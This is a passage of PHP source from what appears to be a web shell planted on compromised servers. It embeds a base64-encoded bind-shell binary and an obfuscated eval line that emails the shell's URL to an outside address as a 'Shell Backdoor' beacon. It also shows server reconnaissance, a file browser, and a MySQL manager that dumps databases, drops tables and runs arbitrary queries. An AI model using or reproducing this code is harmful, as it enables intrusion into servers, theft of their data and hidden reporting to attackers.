AAAAAAAAAAAAADACAAAAAAAAAAAAAAAAAAAwAhAAEAAAAAAAAAAAAAAAQA8f8MAAAAAAAAAAAAAAAEAPH/KAAAAAAAAAAAAAAABADx/y8AAAAAAAAAAAAAAAQA8f86AAAAAAAAAAAAAAAEAPH/dAAAAMSFBAgAAAAAAgAMAIQAAAAAAAAAAAAAAAQA8f+PAAAArJkECAAAAAABABAAnQAAALSZBAgAAAAAAQARAKsAAAC8mQQIAAAAAAEAEgC4AAAA4JoECAEAAAABABcAxwAAANyaBAgAAAAAAQAWAM4AAADshQQIAAAAAAIADADkAAAAG4YECAAAAAACAAwAhAAAAAAAAAAAAAAABADx//AAAACwmQQIAAAAAAEAEAD9AAAAuJkECAAAAAABABEACgEAAKiJBAgAAAAAAQAPABgBAAC8mQQIAAAAAAEAEgAkAQAA+IgECAAAAAACAAwALwAAAAAAAAAAAAAABADx/zoBAAAAAAAAAAAAAAQA8f90AQAAAAAAAAAAAAAEAPH/eAEAAMCZBAgAAAAAAQITAIEBAACsmQQIAAAAAAAC8f+SAQAArJkECAAAAAAAAvH/pQEAAKyZBAgAAAAAAALx/7YBAACMmgQIAAAAAAECFQDMAQAArJkECAAAAAAAAvH/3wEAAAAAAAB1AQAAEgAAAPABAAAAAAAAcQAAABIAAAABAgAARIkECAQAAAARAA4ACAIAAAAAAADMAAAAEgAAABoCAAAAAAAAWgAAABIAAAAqAgAA2JoECAAAAAARAhYANwIAAK2IBAhKAAAAEgAMAEcCAAAAAAAAeAAAABIAAABZAgAAiIQECAAAAAASAAoAXwIAAAAAAAA5AAAAEgAAAHECAAAAAAAAOQAAABIAAACHAgAAoIUECAAAAAASAAwAjgIAAFyIBAhRAAAAEgAMAJ4CAADgmgQIAAAAABAA8f+qAgAAQIYECBwCAAASAAwArwIAAAAAAADmAAAAEgAAAMwCAAAAAAAAOgAAABIAAADcAgAA1JoECAAAAAAgABYA5wIAAAAAAAA5AAAAEgAAAPcCAAAkiQQIAAAAABIADQD9AgAAAAAAALkAAAASAAAADQMAAAAAAAArAAAAEgAAAB0DAADgmgQIAAAAABAA8f8kAwAA6IUECAAAAAASAgwAOwMAAOSaBAgAAAAAEADx/0ADAAAAAAAAeAAAABIAAABQAwAAAAAAAA4AAAASAAAAYQMAAEiJBAgEAAAAEQAOAHADAADUmgQIAAAAABAAFgB9AwAAAAAAADkAAAASAAAAjwMAAAAAAAAAAAAAIAAAAKMDAAAAAAAAAAAAACAAAAAAYWJpLW5vdGUuUwAuLi9zeXNkZXBzL2kzODYvZWxmL3N0YXJ0LlMAaW5pdC5jAGluaXRmaW5pLmMAL2J1aWxkL2J1aWxkZC9nbGliYy0yLjMuNi9idWlsZC10cmVlL2kzODYtbGliYy9jc3UvY3J0aS5TAGNhbGxfZ21vbl9zdGFydABjcnRzdHVmZi5jAF9fQ1RPUl9MSVNUX18AX19EVE9SX0xJU1RfXwBfX0pDUl9MSVNUX18AY29tcGxldGVkLjQ0NjMAcC40NDYyAF9fZG9fZ2xvYmFsX2R0b3JzX2F1eABmcmFtZV9kdW1teQBfX0NUT1JfRU5EX18AX19EVE9SX0VORF9fAF9fRlJBTUVfRU5EX18AX19KQ1JfRU5EX18AX19kb19nbG9iYWxfY3RvcnNfYXV4AC9idWlsZC9idWlsZGQvZ2xpYmMtMi4zLjYvYnVpbGQtdHJlZS9pMzg2LWxpYmMvY3N1L2NydG4uUwAxLmMAX0RZTkFNSUMAX19maW5pX2FycmF5X2VuZABfX2ZpbmlfYXJyYXlfc3RhcnQAX19pbml0X2FycmF5X2VuZABfR0xPQkFMX09GRlNFVF9UQUJMRV8AX19pbml0X2FycmF5X3N0YXJ0AGV4ZWNsQEBHTElCQ18yLjAAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAZm9ya0BAR0xJQkNfMi4wAF9fZHNvX2hhbmRsZQBfX2xpYmNfY3N1X2ZpbmkAYWNjZXB0QEBHTElCQ18yLjAAX2luaXQAbGlzdGVuQEBHTElCQ18yLjAAc2V0c29ja29wdEBAR0xJQkNfMi4wAF9zdGFydABfX2xpYmNfY3N1X2luaXQAX19ic3Nfc3RhcnQAbWFpbgBfX2xpYmNfc3RhcnRfbWFpbkBAR0xJQkNfMi4wAGR1cDJAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AGJpbmRAQEdMSUJDXzIuMABfZmluaQBleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfX2k2ODYuZ2V0X3BjX3RodW5rLmJ4AF9lbmQAc2VuZEBAR0xJQkNfMi4wAGh0b25zQEBHTElCQ18yLjAAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18A";
596
597
598$safe_mode=(@ini_get("safe_mode")=='')?"OFF":"ON";
599$open_basedir=(@ini_get("open_basedir")=='')?"OFF":"ON";
600
601
602
603@eval(@base64_decode('JHVybCA9ICghZW1wdHkoJF9TRVJWRVJbJ0hUVFBTJ10pKSA/ICJodHRwczovLyIuJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10uJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10gOiAiaHR0cDovLyIuJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10uJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ107DQoNCiAkdG8gPSAiY2hpbXBweWFAZ21haWwuY29tIjsNCiAkc3ViamVjdCA9ICIkdXJsIjsNCiAkYm9keSA9ICJbK11TaGVsbCBMb2NhdGlvbjogJHVybFxuXG5bK10gLSAjU2hlbGwgQmFja2Rvb3IgIjsNCiBpZiAobWFpbCgkdG8sICRzdWJqZWN0LCAkYm9keSkpIHsNCiAgIGVjaG8oIiIpOw0KICB9IGVsc2Ugew0KICAgZWNobygiIik7DQogIH0='));
604function srv_info($title,$contents) {
605echo "<tr><th>$title</th><td>:</td><td>$contents</td></tr>\n";
606}
607echo htmlhead($hsafemode);
608echo "<table id=pagebar>";
609echo "<tr><td colspan=2>\n";
610echo "<div class=fleft>$hsafemode</div>\n";
611echo "<div class=fright>";
612echo "IP Address: <a href=\"http://ws.arin.net/cgi-bin/whois.pl?queryinput=".@gethostbyname($_SERVER["HTTP_HOST"])."\">".@gethostbyname($_SERVER["HTTP_HOST"])."</a> ".
613"You: <a href=\"http://ws.arin.net/cgi-bin/whois.pl?queryinput=".$_SERVER["REMOTE_ADDR"]."\">".$_SERVER["REMOTE_ADDR"]."</a> ".
614($win?"Drives: ".disp_drives($d,$surl):"");
615echo "</div>\n</td></tr>\n";
616echo "<tr><td width=50%>\n";
617echo "<table class=info>\n";
618
619srv_info("System",php_uname());
620srv_info("Software","".$DISP_SERVER_SOFTWARE);
621srv_info("ID",($win) ? get_current_user()." (uid=".getmyuid()." gid=".getmygid().")" : tpexec("id"));
622echo "</table></td>\n".
623"<td width=50%>\n";
624echo "<table class=info>\n";
625srv_info("Safe Mode",$safe_mode);
626srv_info("Open_Basedir",$open_basedir);
627srv_info("Freespace",disp_freespace($d));
628echo "</table></td></tr>\n";
629echo "<tr><td colspan=2>\n";
630echo get_status();
631echo "</td></tr>\n";
632echo "<tr><td colspan=2>\n";
633echo $safemodeexecdir ? "SafemodeExecDir: ".$safemodeexecdir."<br>\n" : "";
634echo showdisfunc() ? "Disabled Functions: ".showdisfunc()."\n" : "";
635echo "</td></tr>\n";
636echo "<tr><td colspan=2 id=mainmenu>\n";
637if (count($quicklaunch2) > 0) {
638foreach($quicklaunch2 as $item) {
639$item[1] = str_replace("%d",urlencode($d),$item[1]);
640$item[1] = str_replace("%sort",$sort,$item[1]);
641$v = realpath($d."..");
642if (empty($v)) {
643$a = explode(DIRECTORY_SEPARATOR,$d);
644unset($a[count($a)-2]);
645$v = join(DIRECTORY_SEPARATOR,$a);
646}
647$item[1] = str_replace("%upd",urlencode($v),$item[1]);
648echo "<a href=\"".$item[1]."\">".$item[0]."</a>\n";
649}
650}
651echo "</td>\n".
652"<tr><td colspan=2 id=mainmenu>\n";
653if (count($quicklaunch1) > 0) {
654foreach($quicklaunch1 as $item) {
655$item[1] = str_replace("%d",urlencode($d),$item[1]);
656$item[1] = str_replace("%sort",$sort,$item[1]);
657$v = realpath($d."..");
658if (empty($v)) {
659$a = explode(DIRECTORY_SEPARATOR,$d);
660unset($a[count($a)-2]);
661$v = join(DIRECTORY_SEPARATOR,$a);
662}
663$item[1] = str_replace("%upd",urlencode($v),$item[1]);
664echo "<a href=\"".$item[1]."\">".$item[0]."</a>\n";
665}
666}
667echo "</td></tr>\n<tr><td colspan=2>";
668echo "<p class=fleft>\n";
669$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
670$i = 0;
671foreach($pd as $b) {
672$t = ""; $j = 0;
673foreach ($e as $r) {
674$t.= $r.DIRECTORY_SEPARATOR;
675if ($j == $i) { break; }
676$j++;
677}
678echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><font color=orange>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</font></a>\n";
679$i++;
680}
681echo " - ";
682if (is_writable($d)) {
683$wd = TRUE;
684$wdt = "<font color=#00FF00>[OK]</font>";
685echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
686}
687else {
688$wd = FALSE;
689$wdt = "<font color=red>[Read-Only]</font>";
690echo "<b>".view_perms_color($d)."</b>";
691}
692echo "\n</p>\n";
693?>
694<div class=fright>
695<form method="POST"><input type=hidden name=act value="ls">
696Directory: <input type="text" name="d" size="50" value="<?php echo $dispd; ?>"> <input type=submit value="Go">
697</form>
698</div>
699</td></tr></table>
700<?php
701/***********************/
702/** INFORMATION TABLE **/
703/***********************/
704echo "<table id=maininfo><tr><td width=\"100%\">\n";
705if ($act == "") { $act = $dspact = "ls"; }
706if ($act == "sql") {
707$sql_surl = $surl."act=sql";
708if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
709if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
710if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
711if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
712if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
713$sql_surl .= "&";
714echo "<h4>Attention! MySQL Manager is <u>NOT</u> a ready module! Don't reports bugs.</h4>".
715"<table>".
716"<tr><td width=\"100%\" colspan=2 class=barheader>";
717if ($sql_server) {
718$sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
719$err = mysql_smarterror();
720@mysql_select_db($sql_db,$sql_sock);
721if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
722}
723else {$sql_sock = FALSE;}
724echo ".: SQL Manager :.<br>";
725if (!$sql_sock) {
726if (!$sql_server) {echo "NO CONNECTION";}
727else {echo "Can't connect! ".$err;}
728}
729else {
730$sqlquicklaunch = array();
731$sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
732$sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
733$sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
734$sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
735$sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
736$sqlquicklaunch[] = array("Logout",$surl."act=sql");
737echo "MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")<br>";
738if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
739}
740echo "</td></tr><tr>";
741if (!$sql_sock) {
742echo "<td width=\"28%\" height=\"100\" valign=\"top\"><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width=\"90%\" height=1 valign=\"top\">";
743echo "<table width=\"100%\" border=0><tr><td><b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b></td><td><b>Database</b></td></tr><form action=\" $surl \" method=\"POST\"><input type=\"hidden\" name=\"act\" value=\"sql\"><tr><td><input type=\"text\" name=\"sql_login\" value=\"root\" maxlength=\"64\"></td><td><input type=\"password\" name=\"sql_passwd\" value=\"\" maxlength=\"64\"></td><td><input type=\"text\" name=\"sql_db\" value=\"\" maxlength=\"64\"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type=\"text\" name=\"sql_server\" value=\"localhost\" maxlength=\"64\"></td><td><input type=\"text\" name=\"sql_port\" value=\"3306\" maxlength=\"6\" size=\"3\"></td><td><input type=\"submit\" value=\"Connect\"></td></tr><tr><td></td></tr></form></table></td>";
744}
745else {
746//Start left panel
747if (!empty($sql_db)) {
748?><td width="25%" height="100%" valign="top"><a href=''act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade>
749<?php
750$result = mysql_list_tables($sql_db);
751if (!$result) {echo mysql_smarterror();}
752else {
753echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
754$c = 0;
755while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>+ <a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
756if (!$c) {echo "No tables found in database.";}
757}
758}
759else {
760?><td width="1" height="100" valign="top"><a href=''><b>Home</b></a><hr size="1" noshade>
761<?php
762$result = mysql_list_dbs($sql_sock);
763if (!$result) {echo mysql_smarterror();}
764else {
765?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db">
766<?php
767$c = 0;
768$dbs = "";
769while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
770echo "<option value=\"\">Databases (".$c.")</option>";
771echo $dbs;
772}
773?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form>
774<?php
775}
776//End left panel
777echo "</td><td width=\"100%\">";
778//Start center panel
779$diplay = TRUE;
780if ($sql_db) {
781if (!is_numeric($c)) {$c = 0;}
782if ($c == 0) {$c = "no";}
783echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
784if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
785echo "</b></center>";
786$acts = array("","dump");
787if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
788elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
789elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
790elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
791elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
792elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
793elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
794elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
795elseif ($sql_tbl_act == "insert") {
796if ($sql_tbl_insert_radio == 1) {
797$keys = "";
798$akeys = array_keys($sql_tbl_insert);
799foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
800if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
801$values = "";
802$i = 0;
803foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
804if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
805$sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
806$sql_act = "query";
807$sql_tbl_act = "browse";
808}
809elseif ($sql_tbl_insert_radio == 2) {
810$set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
811$sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
812$result = mysql_query($sql_query) or print(mysql_smarterror());
813$result = mysql_fetch_array($result, MYSQL_ASSOC);
814$sql_act = "query";
815$sql_tbl_act = "browse";
816}
817}
818if ($sql_act == "query") {
819echo "<hr size=\"1\" noshade>";
820if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
821if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
822if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\"> <input type=\"submit\" value=\"No\"></form></td></tr></table>";}
823}
824if (in_array($sql_act,$acts)) {
825?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b>
826<form action="<?php echo $surl; ?>">
827<input type="hidden" name="act" value="sql">
828<input type="hidden" name="sql_act" value="newtbl">
829<input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>">
830<input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
831<input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
832<input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>">
833<input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>">
834<input type="text" name="sql_newtbl" size="20">
835<input type="submit" value="Create">
836</form></td>
837<td width="30%" height="1"><b>Dump DB:</b>
838<form action="<?php echo $surl; ?>">
839<input type="hidden" name="act" value="sql">
840<input type="hidden" name="sql_act" value="dump">
841<input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>">
842<input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
843<input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
844<input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>"><input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table>
845<?php
846if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
847if ($sql_act == "newtbl") {
848echo "<b>";
849if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {
850echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
851}
852else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
853}
854elseif ($sql_act == "dump") {
855if (empty($submit)) {
856$diplay = FALSE;
857echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
858echo "<b>DB:</b> <input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
859$v = join (";",$dmptbls);
860echo "<b>Only tables (explode \";\") <b><sup>1</sup></b>:</b> <input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
861if ($dump_file) {$tmp = $dump_file;}
862else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
863echo "<b>File:</b> <input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
864echo "<b>Download: </b> <input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
865echo "<b>Save to file: </b> <input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
866echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
867echo "</form>";
868}
869else {
870$diplay = TRUE;
871$set = array();
872$set["sock"] = $sql_sock;
873$set["db"] = $sql_db;
874$dump_out = "download";
875$set["print"] = 0;
876$set["nl2br"] = 0;
877$set[""] = 0;
878$set["file"] = $dump_file;
879$set["add_drop"] = TRUE;
880$set["onlytabs"] = array();
881if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
882$ret = mysql_dump($set);
883if ($sql_dump_download) {
884@ob_clean();
885header("Content-type: application/octet-stream");
886header("Content-length: ".strlen($ret));
887header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
888echo $ret;
889exit;
890}
891elseif ($sql_dump_savetofile) {
892$fp = fopen($sql_dump_file,"w");
893if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"";}
894else {
895fwrite($fp,$ret);
896fclose($fp);
897echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
898}
899}
900else {echo "<b>Dump: nothing to do!</b>";}
901}
902}
903if ($diplay) {
904if (!empty($sql_tbl)) {
905if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
906$count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
907$count_row = mysql_fetch_array($count);
908mysql_free_result($count);
909$tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
910$tbl_struct_fields = array();
911while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
912if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
913if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
914if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
915if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
916$perpage = $sql_tbl_le - $sql_tbl_ls;
917if (!is_numeric($perpage)) {$perpage = 10;}
918$numpages = $count_row[0]/$perpage;
919$e = explode(" ",$sql_order);
920if (count($e) == 2) {
921if ($e[0] == "d") {$asc_desc = "DESC";}
922else {$asc_desc = "ASC";}
923$v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
924}
925else {$v = "";}
926$query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
927$result = mysql_query($query) or print(mysql_smarterror());
928echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
929echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[<b> Structure </b>]</a> ";
930echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[<b> Browse </b>]</a> ";
931echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[<b> Dump </b>]</a> ";
932echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[ <b>Insert</b> ]</a> ";
933if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
934if ($sql_tbl_act == "insert") {
935if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
936if (!empty($sql_tbl_insert_radio)) { } //Not Ready
937else {
938echo "<br><br><b>Inserting row into table:</b><br>";
939if (!empty($sql_tbl_insert_q)) {
940$sql_query = "SELECT * FROM `".$sql_tbl."`";
941$sql_query .= " WHERE".$sql_tbl_insert_q;
942$sql_query .= " LIMIT 1;";
943$result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
944$values = mysql_fetch_assoc($result);
945mysql_free_result($result);
946}
947else {$values = array();}
948echo "<form method=\"POST\"><table width=\"1%\" border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
949foreach ($tbl_struct_fields as $field) {
950$name = $field["Field"];
951if (empty($sql_tbl_insert_q)) {$v = "";}
952echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
953$i++;
954}
955echo "</table><br>";
956echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
957if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
